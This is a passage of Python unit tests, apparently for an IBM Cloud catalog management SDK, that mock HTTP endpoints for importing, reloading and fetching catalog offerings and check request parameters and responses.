    # Exactly one HTTP call must have been made, answered with 201 Created.
    assert len(responses.calls) == 1
    assert response.status_code == 201
@responses.activate
def test_import_offering_version_value_error(self):
    """
    test_import_offering_version_value_error()

    Verify that import_offering_version() raises ValueError whenever any
    one of its required parameters is missing (None).
    """
    # Set up a mocked POST endpoint; it should never actually be hit,
    # because every invocation below must fail validation client-side.
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/version')
    mock_response = (
        '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", '
        '"delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": '
        '"disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    )
    responses.add(
        responses.POST,
        url,
        body=mock_response,
        content_type='application/json',
        status=201,
    )

    # Set up required parameter values.
    catalog_identifier = 'testString'
    offering_id = 'testString'

    # Pass in all but one required param and check for a ValueError.
    req_param_dict = {
        "catalog_identifier": catalog_identifier,
        "offering_id": offering_id,
    }
    for param in req_param_dict:
        # FIX: compare keys with `!=`, not `is not` -- identity comparison of
        # strings only works by CPython interning accident and is fragile.
        req_copy = {key: (val if key != param else None) for (key, val) in req_param_dict.items()}
        with pytest.raises(ValueError):
            _service.import_offering_version(**req_copy)
class TestImportOffering:
    """
    Test Class for import_offering

    All three tests mock the same POST endpoint with the same generated
    Offering payload, so the payload and its registration are shared via
    a class constant and a private helper.
    """

    # Canned Offering JSON returned by every mocked POST in this class.
    # Adjacent string literals are concatenated into one long body.
    _MOCK_RESPONSE = (
        '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", '
        '"delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": '
        '"disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    )

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL with one or more trailing slashes becomes a regex matching any
        number of trailing slashes; any other URL is returned unchanged.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    def _register_mock(self, url):
        """Register the shared 201/JSON mock POST response for *url*."""
        responses.add(responses.POST,
                      url,
                      body=self._MOCK_RESPONSE,
                      content_type='application/json',
                      status=201)

    @responses.activate
    def test_import_offering_all_params(self):
        """
        import_offering()

        Invoke import_offering() with every optional argument supplied and
        validate the query string and JSON body that were sent.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/import/offerings')
        self._register_mock(url)

        # Set up parameter values
        catalog_identifier = 'testString'
        tags = ['testString']
        target_kinds = ['testString']
        content = b'This is a mock byte array value.'
        zipurl = 'testString'
        offering_id = 'testString'
        target_version = 'testString'
        include_config = True
        is_vsi = True
        repo_type = 'testString'
        x_auth_token = 'testString'

        # Invoke method
        response = _service.import_offering(
            catalog_identifier,
            tags=tags,
            target_kinds=target_kinds,
            content=content,
            zipurl=zipurl,
            offering_id=offering_id,
            target_version=target_version,
            include_config=include_config,
            is_vsi=is_vsi,
            repo_type=repo_type,
            x_auth_token=x_auth_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 201

        # Validate query params (unquoted for human-readable comparison)
        query_string = responses.calls[0].request.url.split('?', 1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'zipurl={}'.format(zipurl) in query_string
        assert 'offeringID={}'.format(offering_id) in query_string
        assert 'targetVersion={}'.format(target_version) in query_string
        assert 'includeConfig={}'.format('true' if include_config else 'false') in query_string
        assert 'isVSI={}'.format('true' if is_vsi else 'false') in query_string
        assert 'repoType={}'.format(repo_type) in query_string

        # Validate body params; `content` is sent base64-encoded.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['tags'] == ['testString']
        assert req_body['target_kinds'] == ['testString']
        assert req_body['content'] == 'VGhpcyBpcyBhIG1vY2sgYnl0ZSBhcnJheSB2YWx1ZS4='

    @responses.activate
    def test_import_offering_required_params(self):
        """
        test_import_offering_required_params()

        Invoke import_offering() with only its required parameter.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/import/offerings')
        self._register_mock(url)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Invoke method
        response = _service.import_offering(
            catalog_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 201

    @responses.activate
    def test_import_offering_value_error(self):
        """
        test_import_offering_value_error()

        Verify that a missing required parameter raises ValueError.
        """
        # Set up mock (should never be hit; validation fails client-side)
        url = self.preprocess_url(_base_url + '/catalogs/testString/import/offerings')
        self._register_mock(url)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
        }
        for param in req_param_dict:
            # FIX: compare keys with `!=`, not `is not` -- string identity
            # comparison only works by CPython interning accident.
            req_copy = {key: (val if key != param else None) for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.import_offering(**req_copy)
class TestReloadOffering():
"""
Test Class for reload_offering
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_reload_offering_all_params(self):
"""
reload_offering()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/reload')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", 
"delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": 
"disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
target_version = 'testString'
tags = ['testString']
target_kinds = ['testString']
content = b'This is a mock byte array value.'
zipurl = 'testString'
repo_type = 'testString'
# Invoke method
response = _service.reload_offering(
catalog_identifier,
offering_id,
target_version,
tags=tags,
target_kinds=target_kinds,
content=content,
zipurl=zipurl,
repo_type=repo_type,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'targetVersion={}'.format(target_version) in query_string
assert 'zipurl={}'.format(zipurl) in query_string
assert 'repoType={}'.format(repo_type) in query_string
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['tags'] == ['testString']
assert req_body['target_kinds'] == ['testString']
assert req_body['content'] == 'VGhpcyBpcyBhIG1vY2sgYnl0ZSBhcnJheSB2YWx1ZS4='
@responses.activate
def test_reload_offering_required_params(self):
    """
    test_reload_offering_required_params()
    """
    # Register a mocked PUT endpoint that replies with a canned Offering payload.
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/reload')
    mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    responses.add(responses.PUT, url, body=mock_response, content_type='application/json', status=201)

    # Required parameters only — no body or optional query values.
    catalog_identifier = 'testString'
    offering_id = 'testString'
    target_version = 'testString'

    # Exercise the operation.
    response = _service.reload_offering(
        catalog_identifier,
        offering_id,
        target_version,
        headers={}
    )

    # Exactly one HTTP request should have been issued, and it should succeed.
    assert len(responses.calls) == 1
    assert response.status_code == 201

    # The target version must be transmitted as the 'targetVersion' query parameter.
    raw_query = responses.calls[0].request.url.split('?', 1)[1]
    decoded_query = urllib.parse.unquote_plus(raw_query)
    assert 'targetVersion={}'.format(target_version) in decoded_query
@responses.activate
def test_reload_offering_value_error(self):
    """
    test_reload_offering_value_error()
    """
    # Register a mocked PUT endpoint that replies with a canned Offering payload.
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/reload')
    mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    responses.add(responses.PUT, url, body=mock_response, content_type='application/json', status=201)

    # Set up parameter values.
    catalog_identifier = 'testString'
    offering_id = 'testString'
    target_version = 'testString'

    req_param_dict = {
        "catalog_identifier": catalog_identifier,
        "offering_id": offering_id,
        "target_version": target_version,
    }
    # Null out each required argument in turn and expect a ValueError.
    for missing in req_param_dict:
        call_args = dict(req_param_dict)
        call_args[missing] = None
        with pytest.raises(ValueError):
            _service.reload_offering(**call_args)
class TestGetOffering():
    """
    Test Class for get_offering
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is matched through a regex that
        # tolerates any number of trailing slashes; other URLs match literally.
        if re.fullmatch('.*/+', request_url) is not None:
            return re.compile(request_url.rstrip('/') + '/+')
        return request_url

    @responses.activate
    def test_get_offering_all_params(self):
        """
        get_offering()
        """
        # Register a mocked GET endpoint that replies with a canned Offering payload.
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
        responses.add(responses.GET, url, body=mock_response, content_type='application/json', status=200)

        # Set up parameter values.
        catalog_identifier = 'testString'
        offering_id = 'testString'

        # Exercise the operation.
        response = _service.get_offering(
            catalog_identifier,
            offering_id,
            headers={}
        )

        # Exactly one HTTP request should have been issued, and it should succeed.
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_offering_value_error(self):
        """
        test_get_offering_value_error()
        """
        # Register a mocked GET endpoint that replies with a canned Offering payload.
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
